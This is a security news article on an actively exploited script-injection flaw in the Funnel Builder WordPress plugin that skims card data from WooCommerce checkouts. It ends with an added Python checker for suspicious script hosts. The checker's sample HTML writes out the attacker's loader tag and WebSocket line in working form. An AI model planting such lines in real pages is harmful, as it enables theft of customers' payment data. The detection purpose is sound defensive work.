Critical Vulnerability in Funnel Builder WordPress Plugin Exploited to Steal Credit Card Data
A critical unauthenticated vulnerability in the **Funnel Builder** plugin for WordPress is being actively exploited to inject malicious JavaScript into **WooCommerce** checkout pages. The flaw allows attackers to steal credit card information and other customer data. Users are urged to update immediately to version 3.15.0.3 or later.

Security researchers have uncovered active exploitation of a critical vulnerability affecting the **Funnel Builder** plugin for WordPress. This flaw allows unauthenticated attackers to inject malicious JavaScript snippets into **WooCommerce** checkout pages, potentially compromising sensitive customer data.
### Vulnerability Details
The vulnerability, which currently lacks an official **CVE** identifier, impacts all versions of the plugin prior to 3.15.0.3. **Funnel Builder**, developed by **FunnelKit**, is a popular plugin used to customize checkout pages with features like one-click upsells and landing pages, aiming to optimize conversion rates. The plugin is active on over 40,000 websites, according to WordPress.org statistics.
### Attack Vector
**Sansec** discovered the malicious activity, noting that the injected payload (analytics-reports[.]com/wss/jquery-lib.js) is disguised as a fake **Google Tag Manager**/**Google Analytics** script. This script establishes a WebSocket connection to an external location (wss://protect-wss[.]com/ws).
Attackers exploit the vulnerability by modifying the plugin's global settings through an unprotected, publicly exposed checkout endpoint. This allows them to inject arbitrary JavaScript code into the plugin's "External Scripts" setting, leading to the execution of malicious code on every checkout page.
### Data Theft
According to **Sansec**, the attacker-controlled server delivers a customized payment card skimmer designed to steal:
* Credit card numbers
* CVVs
* Billing addresses
* Other customer information
Stolen payment card details can be used for fraudulent online purchases or sold on dark web carding markets.
### Remediation
**FunnelKit** addressed the vulnerability in version 3.15.0.3 of **Funnel Builder**, released recently.
A security advisory from the vendor confirms the malicious activity, stating that they "identified an issue that allowed bad actors to inject scripts."
Website owners and administrators are strongly advised to prioritize updating to the latest version of the plugin through the WordPress dashboard. Additionally, it is crucial to review `Settings > Checkout > External Scripts` for any suspicious or rogue scripts that may have been added by attackers.
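As an added example (not code from the article, Sansec or FunnelKit), the following Python checker scans a saved copy of a checkout page for external script hosts outside an allowlist and for WebSocket endpoints in inline script, flagging the two hostnames the article names. The allowlist and the sample HTML are constructed assumptions.

```python
import re
from html.parser import HTMLParser
# The two hostnames the article names as indicators (defanged there with [.]).
IOC_HOSTS = {"analytics-reports.com", "protect-wss.com"}
# Assumption: the site's own allowlist of legitimate third-party script hosts.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+)")
WS_RE = re.compile(r"wss?://([A-Za-z0-9.-]+)")

class ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def classify(host):
    return "KNOWN-IOC" if host in IOC_HOSTS else "UNLISTED"

def audit_checkout_html(html):
    """Return (severity, kind, host) for unlisted script hosts and WebSocket endpoints."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        match = HOST_RE.match(src)
        host = match.group(1).lower() if match else None
        if host and host not in ALLOWED_HOSTS:
            findings.append((classify(host), "script", host))
    for code in parser.inline:
        for host in WS_RE.findall(code):
            findings.append((classify(host.lower()), "websocket", host.lower()))
    return findings

# Constructed sample page: one legitimate GTM tag plus the two injected items described above.
SAMPLE = ('<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>'
          '<script src="https://analytics-reports.com/wss/jquery-lib.js"></script>'
          '<script>var ws = new WebSocket("wss://protect-wss.com/ws");</script>')
```

Run `audit_checkout_html(SAMPLE)` to see the two flagged hosts; the same function can be pointed at the rendered HTML of a live checkout page saved from a browser.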
